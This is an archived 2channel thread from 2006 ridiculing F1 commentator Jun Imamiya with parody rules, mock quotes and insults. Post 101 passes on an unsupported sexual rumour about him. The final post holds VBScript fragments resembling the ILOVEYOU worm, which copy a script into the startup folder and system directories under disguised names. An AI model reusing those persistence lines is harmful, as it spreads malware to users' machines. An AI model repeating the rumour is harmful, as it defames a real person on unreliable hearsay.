2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【みたまま実況13】今宮 純【日本語でおk】

1 :音速の名無しさん:2006/11/23(木) 18:28:25 ID:KnR7HXdU0
知識がどうとか、人脈がどうとか、正直そのへんはそこまできにならない

ただ、他人の解説に思いっきりかぶせてくるのはほんとかんべん
他人の解説に割り込んで奪い取るとことかね

てきとーに会話の合間でしゃべってくれれば聞き流せるのに
川井とかの解説聞いてるときに純がかぶせてきやがると、ほんと腹立つわ

いいとこがないのはしゃーない
とりあえず悪いところをなくせや

【みたまま実況12】今宮 純【マジ引退してくれ】
http://ex9.2ch.net/test/read.cgi/f1/1159432407/

2 :音速の名無しさん:2006/11/23(木) 18:29:08 ID:KnR7HXdU0
<過去スレ>
★今宮さんおつかれさまでした★
http://makimo.to/2ch/sports_f1/1026/1026101151.html
【みたまま実況】今宮 純【そのまんまじゃん】
http://sports.2ch.net/f1/kako/1033/10330/1033081665.html
【みたまま実況3】今宮 純【CSでもそのまんま】
http://makimo.to/2ch/sports_f1/1047/1047676715.html
【みたまま実況4】今宮 純【そのまんまです】
http://makimo.to/2ch/sports8_f1/1065/1065149937.html
【みたまま実況5】今宮 純【そのまんまです】
http://ex8.2ch.net/test/read.cgi/f1/1088883806/

3 :音速の名無しさん:2006/11/23(木) 18:30:02 ID:KnR7HXdU0
今宮純 不要論
http://ex9.2ch.net/test/read.cgi/f1/1117369542/
http://makimo.to/2ch/ex9_f1/1117/1117369542.html
今宮純 不要論 その2
http://ex9.2ch.net/test/read.cgi/f1/1119104082/
http://makimo.to/2ch/ex9_f1/1119/1119104082.html
【定点観測】今宮純 ある意味不要論【Vol.7】
http://ex9.2ch.net/test/read.cgi/f1/1122818351/
http://makimo.to/2ch/ex9_f1/1122/1122818351.html
今宮純 9
http://ex9.2ch.net/test/read.cgi/f1/1128825701/
http://makimo.to/2ch/ex9_f1/1128/1128825701.html
【みたまま実況10】今宮 純
http://ex9.2ch.net/test/read.cgi/f1/1147646662/
http://makimo.to/2ch/ex9_f1/1147/1147646662.html
【みたまま実況11】今宮 純【割り込み禁止】
http://ex9.2ch.net/test/read.cgi/f1/1155377473/
http://makimo.to/2ch/ex9_f1/1155/1155377473.html

4 :音速の名無しさん:2006/11/23(木) 18:37:59 ID:KnR7HXdU0
ちなみに>>1の文章は前スレ744より無断転載w

シーズンオフであまり話題もありませんが、
それでもレジェンズなどが放送中ですのでマターリと逝きましょうです、ハイ。

あ、一応関連スレ( ゚д゚)、ペッ

今宮純マンセースレッド
http://ex9.2ch.net/test/read.cgi/f1/1162075079/

5 :音速の名無しさん:2006/11/23(木) 18:42:59 ID:wQVKC7DZ0
>>1
乙!

>あ、一応関連スレ( ゚д゚)、ペッ
いきなりワラカスナ!w


6 :音速の名無しさん:2006/11/23(木) 18:44:13 ID:74VuLL+P0
情報は視聴者が画面等から収集している。
溢れる情報を整理して伝えるのは実況アナウンサーの仕事。

「解説」の仕事とは、上辺や見た目だけでは捉えきれない情報を指摘・提示したり、
整理された情報の不足を補ったりすることをいう。

ところが今宮の称する「解説」ときたら、
パドックにいてもすることがないからコースサイドでひとりぼっち、
その寂しさの憤懣をドライバーにブツけただけのコラムを書き殴り、
放送席では天気予報をしてみたり、タイミングモニターを読んでみたり、
他のコメンテーターが「解説」しているところに割り込んで
話の腰を折ってみたり、独りよがりの感動を押し売りしてみたり
情報の補足というよりは情報の錯綜としてしか機能していない。

まったくもって「解説」していないのである。
今宮は、解説をしない・できない。なぜなら、無能だから。

7 :音速の名無しさん:2006/11/23(木) 22:56:04 ID:nD19bvK00
1) 動詞の後ろに「こむ」を付ける
例 やる→やりこむ 決める→決めこむ 作る→作りこむ 走る→走り込む など

2) 質問に答えられないときは「そういう意味では」という言葉をきっかけに
  話を大きく広げてごまかすように努める

3) できるだけコースサイドに出て、生の車の挙動をチェックする。
  こうすることで、パドックで騒動が起きても「僕は知らなかった」と逃げられる。

4) ホテルに帰ってから、計時記録やVTRをしっかり見ておく。
  速かったラップと遅かったラップを覚えておけば、
  結果論でなんとでも言えるものだ。

5) 日本語でも、できるだけ外来語っぽいアクセントを用いて、
  視聴者に「洋モノっぽい」雰囲気を刷り込む。
例 ガトーショコラ=サトータクマ エッフアーイェーイ など

6) ミスしたドライバーやチームには、声を荒げるなどして
  徹底的に糾弾し、自らを権威的な存在であるかのようにPRすべきである。
例 だからー、無理すると壊れるんですよ! 大いに反省してもらいたい! など

7) 専門用語や固有名詞でカタカナ語を用いる場合は、
  なるべく二語以上を無理矢理くっつけて、アクセントを変えて発音する。
  外国語に精通しているというイメージが作れる。
  あくまでイメージなので、アクセントや発音が正確である必要はない。
例 ベストベスト バージョンアップ ミハエルシューマッハフェラーリアタック
   アロンソルノーポール ザウバーペトロナスカッコフェラーリ など

8) 独自の用語を新造すれば、他の解説者に一歩先んじることができる
例 赤組銀組 定点観測 全損バトン など


8 :音速の名無しさん:2006/11/23(木) 23:02:22 ID:nD19bvK00
9) 他の解説者が、自分がついていけそうにない高度な話題で盛り上がっているときは、
  話の腰を折るなどしてこれを妨害し、自らの存在感を示すよう努める
例 画面に戻りましょう カットインしていいですか いま井出がセクターツーベストベスト など

10) 伝聞の情報であっても、その出典元を明示してはいけない。
  自ら取材して得た情報であるかのように偽らねばならない。
  間違っても「知りません」「会ってません」「聞いてません」は禁句である。

11) 分からないときは、とりあえず川井に相づちを打っておく
  だが、川井が間違ったことを言ってる場合(アロンソ・フィジコの判別など)や、
  川井から逆質問を振られたとき(今宮さん、タイヤのセットナンバー見えます?)に、
  己の無能っぷりが露見する諸刃の剣なので、注意を怠らないこと

12) 経験の浅いアナウンサーを見つけ次第、ささいなミスを指摘するなどして
  食ってかかり、自らの権威の相対的な向上に励む。相手がベテランの場合は、
  わざと難しい質問で斬り返されることがあるので十分に気を付けること。

13) 質問に答えられるときは、ただ答えるだけでなく、
  「ですから以前から再三申し上げていますが」などの接頭語を付け、
  「お前ら知らんのか。俺は何でも知ってるぞ」という強迫観念を植え付けるようにする。
例 噂、噂、ありました パドックでは公然の秘密ですが など

14) レース中は、あらゆる予断を排除して、画面に映ったものをリアルタイムで復唱するようにする。
   間違ったことをいっても「画面情報がおかしい」と言い逃れが出来ておいしい。
例 ティーシー作動、ティーシー作動 FIA情報では気温25度 など

15) 視聴者から苦情が多いなと感じたら、とりあえず泣いてみて、同情を集める。

16) 小倉には特に格別の注意を払うこと。彼の広すぎる人脈は東京にいてもなお
   広範にわたるもので、ときとして現地にいる我々のそれを質量ともに上回ることがある。
   精一杯妨害に努めなければ、レギュラー解説の肩書きは守りきれない。

9 :音速の名無しさん:2006/11/24(金) 08:24:14 ID:s1USDFqW0
鈍さんおはよー

10 :音速の名無しさん:2006/11/24(金) 11:02:36 ID:90oazjAv0
川井「おはようござ」今宮「おはようございます。トルコ、イスタンブール、快晴です」

11 :音速の名無しさん:2006/11/24(金) 14:15:19 ID:Yr1tRR1M0
「令営 鈍、定点観測中にサトーに轢かれて死亡」

12 :音速の名無しさん:2006/11/24(金) 15:13:14 ID:JJL27TRD0
>>10 絶妙だなあw

13 :音速の名無しさん:2006/11/24(金) 17:54:30 ID:XeFro1Vk0
ま、87年から中嶋と一緒にま、我々もモータースポーツま、こういう事も受け入れなければいけない、
我々は集中してレースに望まなければいけない。
そういう気持ちで、あの事故の直後僕もずっと喋ってきたんですが、正直言いましてすいません、
あのレース以後、私はちょっと(2006年の)今まで喋れる状況ではありませんでした。
ただ、こういう事実はですね特にモータースポーツに働いて来ている者の一人とすればですね、やはり受け止めなければいけない、
そしてシューマッハも言ってましたけども、こういうま、事実からですねモータースポーツはですね続いていくんです。

14 :音速の名無しさん:2006/11/24(金) 20:48:21 ID:8etXi+4A0
世界のお天気なら、YahooでもGoogleでもNHKでも見られます、はい

15 :音速の名無しさん:2006/11/24(金) 21:38:07 ID:fsVM4gZmO
日本語でおkwwwwwww

16 :音速の名無しさん:2006/11/24(金) 21:58:22 ID:JJL27TRD0
>>13
俺おまえのファンになっちまったよ、まじでw
この際イジメ自殺連鎖問題にもコメントもらいたいっ!

17 :音速の名無しさん:2006/11/24(金) 22:25:15 ID:eq4huCs70
>>13
最後に「、はい。」が必要じゃね?

18 :音速の名無しさん:2006/11/25(土) 00:31:11 ID:zBpsSjRbO
次の開幕はシューマッハはいませんが、F1は続いていくんです。ハイ。

19 :音速の名無しさん:2006/11/25(土) 01:41:01 ID:p+TYS+lt0
ま、87年からフジテレビの全戦中継開始と一緒にま、モータースポーツもま、
こういうことも受け入れなければならない。

そういう気持ちで、大した知識も人脈も語学力もない僕も
F1解説者をやってきたんですが、正直言いましてすいません、
中継開始以来20年間、私はちょっと今まで解説できる器ではありませんでした。

ただ、こういう事実はですね、、特にモータースポーツに寄生してきた者の一人とすればですね、
前から再三申し上げているように、やはり受け止めねばならない。

そしてフランスの友人も言ってましたけども、こういうま、事実からですね、
僕はこれからも解説席にしがみついていくんです、はい。

20 :音速の名無しさん:2006/11/25(土) 11:19:53 ID:3iI4ufQe0
jfg

21 :音速の名無しさん:2006/11/27(月) 14:40:42 ID:Uiry6KOtO
19>>
お前大好き

22 :音速の名無しさん:2006/11/27(月) 19:51:59 ID:0uU3VFDq0
・・・・・・



                baka スレ・・・・・

23 :音速の名無しさん:2006/11/27(月) 19:58:36 ID:nY7XRdA90
>22
哀れ本人乙

24 :音速の名無しさん:2006/11/27(月) 20:06:59 ID:Vv3d2byN0
何この糞スレ・・・

25 :音速の名無しさん:2006/11/27(月) 20:11:07 ID:sHL9OzZD0
このスレもう13も続いてるんだ
ある意味人気がある証拠だなw

26 :音速の名無しさん:2006/11/27(月) 20:33:42 ID:nY7XRdA90
ヒッシ・ダナー [Hissy Danner]

27 :音速の名無しさん:2006/11/28(火) 08:00:49 ID:bkCufsSoO
こんなのダメ。

28 :音速の名無しさん:2006/11/28(火) 18:34:41 ID:IWsf1PLU0
今宮はどうでもいいんだが川井はどうにかできないのだろうか
出しゃばりすぎて萎えるんだが 



29 :音速の名無しさん:2006/11/28(火) 18:46:21 ID:um0+UJzkO
>>28 まったくだ
放送では偉そうに「アイツらは」とか「奴ら」とか言ってるが、インタビュー見るとめちゃめちゃ低姿勢に気持悪い愛想笑い
琢磨のミスを酷評した後に流れた琢磨へのインタビューなんか一番ひどかった


30 :音速の名無しさん:2006/11/28(火) 18:49:37 ID:wf5x8cAu0
>28
>29
ここはカワイチャンのスレぢゃないよ。

31 :音速の名無しさん:2006/11/28(火) 18:55:05 ID:y374fCL+0
いつもの手だけどね

32 :音速の名無しさん:2006/11/28(火) 19:29:53 ID:um0+UJzkO
>>30 オッサンをチャン付けで呼ぶなよw

きもちわりぃ

33 :音速の名無しさん:2006/11/28(火) 19:33:54 ID:GKf3pAWz0
スタジオ解説が森脇さんだと途端に静かになる

34 :音速の名無しさん:2006/11/28(火) 19:46:54 ID:wf5x8cAu0
>31
なるほど
「カワイチャンをsageることによって今宮さんを相対的にageようと試みるけど、
結局今宮さんはageられず」といういつもの手だね。

35 :音速の名無しさん:2006/11/28(火) 20:58:59 ID:SyUzrS40O
今宮なんかあげるぜ

36 :音速の名無しさん:2006/11/28(火) 22:05:47 ID:GbD/AQEZ0
28 音速の名無しさん New! 2006/11/28(火) 18:34:41 ID:IWsf1PLU0
今宮はどうでもいいんだが川井はどうにかできないのだろうか
出しゃばりすぎて萎えるんだが 


29 音速の名無しさん New! 2006/11/28(火) 18:46:21 ID:um0+UJzkO
>>28 まったくだ
放送では偉そうに「アイツらは」とか「奴ら」とか言ってるが、インタビュー見るとめちゃめちゃ低姿勢に気持悪い愛想笑い
琢磨のミスを酷評した後に流れた琢磨へのインタビューなんか一番ひどかった


2点

37 :音速の名無しさん:2006/11/28(火) 22:20:41 ID:XG3/Jbwz0
わざわざ携帯に替えてレスしたのかなあ

38 :音速の名無しさん:2006/11/28(火) 23:13:29 ID:Mnx66bad0
しかし凄いなこのゲススレ ある意味モデルケースだよ
モタスポマニアよりビンボー人相手にすると中傷スレでも13も逝くんだな。
今後のスレ立て参考にさせていただきますヨ。

39 :音速の名無しさん:2006/11/28(火) 23:34:55 ID:wf5x8cAu0
>36
1レスにつき1点?…

ああ、点数じゃなくて「糞レスが2個」ってことね。
了解したw

40 :音速の名無しさん:2006/11/29(水) 10:52:26 ID:rbn4oB2JO
>>34 完全なノイローゼだなw
ォマイは何と戦ってんだwww

41 :音速の名無しさん:2006/11/29(水) 12:31:50 ID:ePUSusBnO
今宮さんは、
ちびまる子ちゃんのOPに出てくる「インチキおじさん」だね。
取り巻きは子供ばかり。

42 :音速の名無しさん:2006/11/29(水) 12:37:57 ID:ePUSusBnO
あ、間違えた。
×取り巻きは子供
○取り巻きは未熟な大人

43 :いまみやじゅん:2006/11/29(水) 16:40:44 ID:L91g8TcR0
信者の諸君、いつも応援ありがとう、はい

44 :音速の名無しさん:2006/11/29(水) 18:25:59 ID:z6rkZefV0
具体的なことは一切喋れない。結論を言えない。
そういう曖昧なところがスポンサーにとっては好都合なのかもね。
鋭く尖ってはっきりものをいう解説者ならこんなに長期間の契約にはならない。
鋭くないから鈍、尖ってないから鈍、今宮鈍




45 :音速の名無しさん:2006/11/29(水) 22:35:05 ID:ZRKC1Hem0
ガトーショコラ=サトータクマ  バロッシュwww

おれは今宮さんすきだけどなぁ。聞いてもいないこと延々と話し始めるとことか。

46 :音速の名無しさん:2006/11/30(木) 01:33:55 ID:mpwYjV93O
やったアレジ!

47 :音速の名無しさん:2006/11/30(木) 18:13:38 ID:46jpfR400
今宮さん、「実況ばっかりしてないで」、たまには「解説」して下さい

48 :音速の名無しさん:2006/11/30(木) 18:32:11 ID:YYNSkWyR0
>>46
数LAP後
「あ〜っ、アレジ負けた!」

49 :音速の名無しさん:2006/11/30(木) 19:13:25 ID:xm2wCYd80
来年もまたCSに出現するんだろ〜な。
糸冬 了..._〆(゚▽゚*)

50 :音速の名無しさん:2006/11/30(木) 19:14:39 ID:YYNSkWyR0
今宮「50回記念ですね!」

51 :音速の名無しさん:2006/11/30(木) 20:25:13 ID:fWBO2Ibb0
だってモタスポ板最下層スレだし

52 :音速の名無しさん:2006/11/30(木) 22:48:13 ID:mpwYjV93O
>>50
レース後、「あぁセナのマシンから煙。」

53 :音速の名無しさん:2006/12/01(金) 03:41:10 ID:B01TImDk0
>>50
の前、「ロンデニス」

54 :音速の名無しさん:2006/12/01(金) 15:06:29 ID:+5meSt1/O
≫50の前
「ん〜加速がいい!あ〜ここで抜かれちゃうのかな〜?」

55 :音速の名無しさん:2006/12/01(金) 18:36:37 ID:nIA3vYlf0
age

56 :音速の名無しさん:2006/12/01(金) 19:58:45 ID:+FmVKjhxO
どっからでもいけますよ。

57 :音速の名無しさん:2006/12/01(金) 20:02:45 ID:MrAbhCqF0
ヒタヒタと

うまうまと


58 :音速の名無しさん:2006/12/02(土) 02:53:59 ID:hwDhPVT9O
ま、87年のF1中継開始以来ずっと地上波の解説を続けて来ましたが、正直言いまして地上波の解説を降板しようと思ってました。
ま、モータースポーツに関わる一人の者とすれば、私はF1解説CSへの移り変りの事実も受けとめなければいけない、ずっとそんな思い解説を続けて来ましたが、
正直言いまして視聴者の皆さんから私のCSへの移り変りに関してこれ程反響があると思いませんでした。
ですから、来年のCSの解説はクッソーと言ってきた右京さんで、地上波の解説は私、今宮が続けますがF1は続いていくわけです。ハイ。

59 :音速の名無しさん:2006/12/02(土) 02:57:53 ID:trOmG5+Q0
長いよ

60 :音速の名無しさん:2006/12/02(土) 04:29:50 ID:ikjzOBLf0
12コーナーはキーコーナー
ウェットの時はキーコーナー

61 :音速の名無しさん:2006/12/02(土) 12:25:36 ID:jnzgTYa80
>>58
まだウケてると信じて真夜中に書いてたのか・・?

62 :音速の名無しさん:2006/12/02(土) 13:08:13 ID:fIOeFvhz0
>61
>真夜中
日本からじゃないかもしれないし…

63 :音速の名無しさん:2006/12/02(土) 15:19:29 ID:WCFZCjnw0
今宮さん、勇退してください

64 :音速の名無しさん:2006/12/02(土) 15:22:27 ID:qR25dm+I0
無能な奴ほど辞めないものだよ

65 :音速の名無しさん:2006/12/02(土) 21:16:00 ID:8KaLw0TY0




いわゆる 団塊の世代 てやつですよ。





66 :音速の名無しさん:2006/12/02(土) 23:55:21 ID:x51L5HrO0
レジェンドに出てきたけど、走りっぷりばかりの解説
してるから、後半単調になると話すことがなくなって
見た目だけのつまんない解説だったね
引き出しが少なすぎ

67 :音速の名無しさん:2006/12/03(日) 00:34:13 ID:cn2UnsDtO
燃費のV8ですよね。

68 :音速の名無しさん:2006/12/03(日) 01:24:23 ID:EaERp+270
当時の取材メモを読んでるとか言ってるけど、
どうせロクに取材してないのでロクなネタは拾えていない。
ごまかすために、本棚から引っ張り出してきた雑誌のレポートを「そのまんま」パクる。
これでは2時間もたないので、ネタが切れたら「見たまんま」実況する。

後出しジャンケンも満足にできない、アホの今宮。

69 :音速の名無しさん:2006/12/03(日) 05:05:21 ID:QNfLU9NDO
今日の解説は良かったぞ?
やはり昔の解説者だな。

70 :音速の名無しさん:2006/12/03(日) 05:55:13 ID:GiT5nKYp0
裏ネタとかエピソードとかほとんどなかったな。実況だった。

71 :音速の名無しさん:2006/12/03(日) 11:19:13 ID:O7Pngecs0
昔も今も現地まで足運んでるのにコースサイドで漫然と見学してるだけなのは変わってないんだな。
人間同士のコミュニケーションができないから英会話も上達しないしまともな取材もできないままなんだよ。

72 :音速の名無しさん:2006/12/03(日) 13:36:27 ID:xeXXaW/P0
いつもの解説よりは全然良かった。
解説が1人だったので割り込みもないしね。


73 :音速の名無しさん:2006/12/03(日) 19:17:46 ID:3Sl9QpOw0
それでもけっこう竹下の話し途中で入ってきてたぞ

74 :音速の名無しさん:2006/12/03(日) 23:02:08 ID:LMrRBGcpO
今宮包茎

75 :音速の名無しさん:2006/12/03(日) 23:12:42 ID:O7Pngecs0
実況アナの喋ったことをオウム返しにしたり、わかりきったことをクドクド説明する今宮さんの存在は、
TV観戦してても状況がつかめない人にはありがたいのかもしれないね、きっと。


76 :音速の名無しさん:2006/12/04(月) 03:15:01 ID:7chfDA4z0
>>69
信者も「解説」の後ろに「?」を付けるんですな

×解説
○実況

もうちょっと頑張ればインチキ教団から脱会できますよ。

77 :音速の名無しさん:2006/12/04(月) 09:31:06 ID:HpQVsNqA0
こんな低レベルなF1解説者を使ってるのは世界で不治だけだろうな
恥を知って欲しい

78 :音速の名無しさん:2006/12/04(月) 11:51:08 ID:SJUET0Ny0
その席を井出に譲れ!

79 :音速の名無しさん:2006/12/04(月) 19:04:27 ID:Px7uLSTi0
熊倉さんはさすがカーグラフィック誌で編集長まで昇りつめただけの事はある
古いスポーツカーから最新のスポーツカーにも詳しいし運転も上手い
F1やらルマンやらとモータースポーツの知識も豊富だし
解説者としては万能に近い存在ですな

80 :音速の名無しさん:2006/12/04(月) 20:20:57 ID:UBLHTrqSP
熊倉はいやみっぽいから好かん。まだ鈍さんのほうがまし

81 :音速の名無しさん:2006/12/04(月) 22:42:10 ID:AXAIWW8L0
ID:gHahNliL0が今宮さんのマンセースレを荒らして困っています
なぜここに来ないんだろうか?

82 :音速の名無しさん:2006/12/05(火) 00:03:27 ID:gHahNliL0
>81
マンセーができなくてイライラしているのですよ。きっとw

83 :音速の名無しさん:2006/12/05(火) 08:41:54 ID:FlouN3fa0
今宮さんとマッチさんだったら、
他人の話に割り込んだりかぶせたりしない分だけ、
マッチさんの方がイイかな?
目糞と鼻糞どっちか食べろと言われてる気分だけど。

84 :音速の名無しさん:2006/12/05(火) 09:36:23 ID:UfYqCGW+0
熊倉はたかがカー雑誌の編集長だったと言う以外何の取り柄もないのに
凄いだろうと言わんばかりに昔の雑誌記事からの知識をひけらかして解説をし
今宮とともに反感を買い毎年綱渡りをしながら生きながらえていることを感じていない能天気じじぃ
モータースポーツで何の実績もないやつが偉そうに語ることは絶対に許されない



85 :音速の名無しさん:2006/12/05(火) 11:56:06 ID:c2aTInkA0
>たかがカー雑誌の編集長

たかがじゃないんだなーこれが。

86 :音速の名無しさん:2006/12/05(火) 12:10:03 ID:FlouN3fa0
>熊倉はたかがカー雑誌の編集長だったと言う以外何の取り柄もない
今宮さんには何ひとつ取り得がないです。

>今宮とともに反感を買い毎年綱渡りをしながら生きながらえていることを感じていない能天気じじぃ
今宮さんはお天気じじいですけどね。お天気屋さんでもありますけど。


87 :音速の名無しさん:2006/12/05(火) 16:44:52 ID:+xdD5Z2R0
>>86
うまい! 座布団一枚!!

88 :音速の名無しさん:2006/12/05(火) 20:55:08 ID:HTQgNzx10
マンセースレ建ったけど人気無いねw





89 :音速の名無しさん:2006/12/05(火) 23:54:06 ID:dQbjBFXG0
マッチと比較されるようになったら終わりだな

90 :音速の名無しさん:2006/12/06(水) 00:30:56 ID:qWzBCiZJ0
マッチさんをあなどるなー

91 :音速の名無しさん:2006/12/06(水) 01:23:16 ID:gtPNnGAL0
>>84
その雑誌記事を書いてたのが熊倉で、それを読んでたのが今宮w


92 :音速の名無しさん:2006/12/06(水) 01:57:15 ID:qWzBCiZJ0
原文読めないもんね、熊さんや赤井やビルさんが訳したものを我々が
読んでたのと同じように今宮も読んでたわけだよね

93 :音速の名無しさん:2006/12/06(水) 02:33:09 ID:A3NNX4T/0
マンセルが黒旗無視してセナに激突した時、マンセルを批判した今宮さんに対して
赤井大先生が「中継で解説者が的外れな事言ってましたが・・・云々」と言ってましたな。
あの二人の間には独特の緊張感が張り詰めていますな。

94 :音速の名無しさん:2006/12/06(水) 02:43:24 ID:Mlaqcd7G0
いや今宮って天気以外は的外れなことしか言わないから

95 :音速の名無しさん:2006/12/06(水) 04:51:00 ID:aUZIWQHg0
>>84
熊倉さんはロードスターレースだのポルシェカップだのに出られて
好成績を挙げていらっしゃいますが

96 :音速の名無しさん:2006/12/06(水) 11:42:38 ID:EjnbKiozO
天気"だけ"は、実に的確!

97 :音速の名無しさん:2006/12/06(水) 12:06:07 ID:6vaVrfty0
でも川井はチーム関係者からも聴いて「20分後に雨が・・」と言うし
今宮さんもお天気担当としてもっとがんばらないとね!

98 :音速の名無しさん:2006/12/06(水) 12:35:12 ID:2Qp3PqTtO
今宮さんは一般人と同じタイミングモニター見てるから
現在の気温や路面温度の情報は正確です

99 :音速の名無しさん:2006/12/06(水) 18:19:31 ID:qePfE3Jd0
定点観測と知ったかがなぜ有料放送にはびこっているのかわからねぇ
まあ、有料放送で視聴者から金を取ってるくせにトヨタの宣伝入れる馬鹿放送局だから仕方ねえかw

100 :音速の名無しさん:2006/12/06(水) 18:22:24 ID:tWXIjZ5D0
有料放送にCM放送が必要ないと思っているバカ視聴者よりはマシかと

101 :音速の名無しさん:2006/12/06(水) 19:03:17 ID:6xO3Co5M0
>あの二人の間には独特の緊張感が張り詰めていますな。


CXのF1解説者にほぼ決まりかけていたのをCXの役員に尻を貸してかすめ取ったのが鈍だから
垢井が怒るのも無理はないw


102 :音速の名無しさん:2006/12/06(水) 19:19:43 ID:qePfE3Jd0
>有料放送にCM放送が必要ないと思っているバカ視聴者よりはマシかと
ソース出せや!

103 :音速の名無しさん:2006/12/06(水) 20:04:01 ID:sl3Keh1A0
>>102
馬鹿乙 

104 :音速の名無しさん:2006/12/06(水) 20:34:05 ID:vK61zhWw0
>>102
ばかですか?

105 :音速の名無しさん:2006/12/06(水) 20:45:12 ID:+gF9ukY10
>101
へぇ〜、今宮さんは口下手だけど床上手なんだなぁ。


106 :音速の名無しさん:2006/12/07(木) 13:55:33 ID:59ZLOUlG0
ベスト、ベストベスト

107 :音速の名無しさん:2006/12/07(木) 15:09:30 ID:Z0iRvBAo0
>>102
ジップヒットCMとか知らないのかなあ

108 :音速の名無しさん:2006/12/07(木) 18:16:20 ID:ZYAdGRK20
>>102
>ソース出せや!
つまり、お前がバカだという事のソースを出せ、と言ってるのか?
それならこれをどうぞ

99 :音速の名無しさん [sage] :2006/12/06(水) 18:19:31 ID:qePfE3Jd0
定点観測と知ったかがなぜ有料放送にはびこっているのかわからねぇ
まあ、有料放送で視聴者から金を取ってるくせにトヨタの宣伝入れる馬鹿放送局だから仕方ねえかw


109 :音速の名無しさん:2006/12/07(木) 19:12:44 ID:dh/1xjfp0
今宮の天気予報なんて、現地の朝刊かなんか開いて、
字が読めんからマークと数字だけ見て、「なんとなく晴れ、だいたい25度」とかやってるだけ。

ドップラーレーダー持ってるチームの関係者に電話取材する、おぐたん圧勝

110 :音速の名無しさん:2006/12/08(金) 01:48:12 ID:8Pj+1uH90
>今宮の天気予報なんて、現地の朝刊かなんか開いて・・・

↑これもソース希望だな。
随分詳しいから関係者なんだろうな >>109

111 :音速の名無しさん:2006/12/08(金) 01:56:21 ID:B2EjnVkY0
1994年のF1グランプリ特集、10月号だったか11月号だったか、
日本グランプリ直前特集の中で、今宮が天気予報のやり方を述べた記事がある。

なんか図書館から気象庁の記録とか新聞の縮刷版とか借りてきて、
過去○年の平均気温が何度だから、今年は×度、
今年は11月開催だから、10月開催より寒い

とか、そんなレベル。

で、本番では、予報むなしく雨が降った。
アホだな、今宮。

112 :音速の名無しさん:2006/12/08(金) 02:00:09 ID:B2EjnVkY0
ちなみに、気温が何度くらいならポールは何秒、とか一生懸命予想もしてたが、
仮に天気が分かっていてもメカが分かってないから、当たるわけない。

突っつけば突っつくほどボロがでる。まるで詐欺師だな。インチキ今宮。

113 :音速の名無しさん:2006/12/08(金) 02:17:18 ID:VxmTRmpm0
そんなもの衛星のデータでリアルにでるし
ましてやチームはしっかりとしたデータ持ってる
だれかみたいに電接直話してええ?的確な情報?いうわけないだろw

2ちゃんに毒されるなおまいら
何でもかんでも世間の主体を批判し否定するのはもう惨めだろ
とくに世間から引きこもりのおまいら以上F1の世界は絶望的に閉鎖的なんだから
視野を広げよF1はTVの中で走っているわけでない

114 :音速の名無しさん:2006/12/08(金) 03:21:00 ID:VxmTRmpm0
>正直に言います。
ここ1ヶ月間、人を憎みました。
人を恨みました。
悔しかった。苦しかった。
人に会いたくない、喋りたくないから
完全に引き篭もりました。
メールも電話も無視しました。
でもやっと最近気付きました。
そこからは何も生まれないことに。
年内に何か、いい報告ができるように
今は最善を尽くすのみです!!
逆境での前向きはやっぱり難しいですよ。
でもそれをできる人間が、
人生を勝ちながら昇りつめていくんでしょうね。
その過程であればたまには躓いてもいいんですよね。
俺も、もっともっと強い人間にならなアカンなぁ。

115 :音速の名無しさん:2006/12/08(金) 17:02:45 ID:8W3BpvdVO
>>113 >>114
オマエ何言ってんだ!?

116 :音速の名無しさん:2006/12/08(金) 18:18:25 ID:IDc/fGrx0
>>113
>>114
いつもの日本語が変な人?
>電接直話
北京語?広東語?

117 :音速の名無しさん:2006/12/08(金) 19:57:11 ID:akGCwrJ30
>>113
はともかく
>>114
何の引用なのか?

118 :音速の名無しさん:2006/12/09(土) 01:51:23 ID:ChAk7D7j0
デムパ君だね

119 :音速の名無しさん:2006/12/09(土) 10:09:26 ID:yLXwjJHo0
問1(5点)
次の文章の前後に当てはまるものを語群の中から選び、会話を成立させなさい。
ただし
@今宮の台詞は次の語群から使用すること
A古舘の他に三宅・馬場・川井等も使用可とする(実際に使用された言葉を使用する事)

語群(複数回使用可)
「あ〜っ、エンジンから煙!」「あ〜っ、アレジ負けた!」「 あ〜っ、接触!」
「エッフアーイェーイ」「ベストベスト」「セナ万歳!ホンダ万歳!」「ガス欠かな?」 
「あっ、ミスしましたよ」「画面に戻りましょう」「全損バトン」「とんでもないことだ!」
「どこからでもいけますよ」「やった、アレジ!」「スピンターン、スピンターン」




120 :音速の名無しさん:2006/12/09(土) 10:10:52 ID:yLXwjJHo0
解答欄

       ______
     ヾ/::::::::::::::::::::::::::ヾヽ
     i:::::::::(((((((((⌒);)
      |:::::::/        .iノ
      |::::/    ヘ  / |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ,⊥|:|----(=・)-(=・)   |
    l  !:;     ⌒´⊃` |     | 「         」
    ゝ_┃     ´___/   <
       |┗━⊃<二二y'      |
      |   \_二/      \__________
    /ト、   /7:`ヽ、_
  /::::::::| ~''x‐''''~~ /::::::::::::::`ー
/::::::::::::::::| ,,イ;;;;>、 /::::::::::::::::::::::::::
::::::::::::::::::::::| /:::::| /:::::::::::::::::::::::::::::::

    /            /  ヽ   !
   /          /     \  !
   |         /= - .、     ヽ、ヽ_
   ノ     彡 '''^ ̄ ̄ ^ '  -=ニミ、ミ ー
  彡  彡、 /   ∠エ:l> ミ /,.rr:,、|ヽ_彡      
  //{  V       ̄   | 、 ̄ !/
   丿 ヽ,.ゝ ミ        |    j
   ノリ ノ|       /└=_/〉  /
   jへ、 丶、     _ ,_、_  ./   「           」
  /   \  丶、  ー  ニ  /
 /\    \   丶、     /
  ___       \    ー--‐'
/           \   /   \
           /l  /    /!ヽ

121 :音速の名無しさん:2006/12/09(土) 10:40:23 ID:jtrRJqGp0
つまんね
そういうのはネタスレ立ててやってよ

122 :音速の名無しさん:2006/12/09(土) 11:04:29 ID:25MeSLN50
中嶋 悟
183 :音速の名無しさん[]:2006/12/08(金) 19:31:58 ID:BCJSYwwX0
今宮鈍をF1レーサーと勘違いしてる可能性もあるな。

さすが!今宮さん最高!

123 :音速の名無しさん:2006/12/09(土) 16:37:52 ID:b0MhWEwh0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
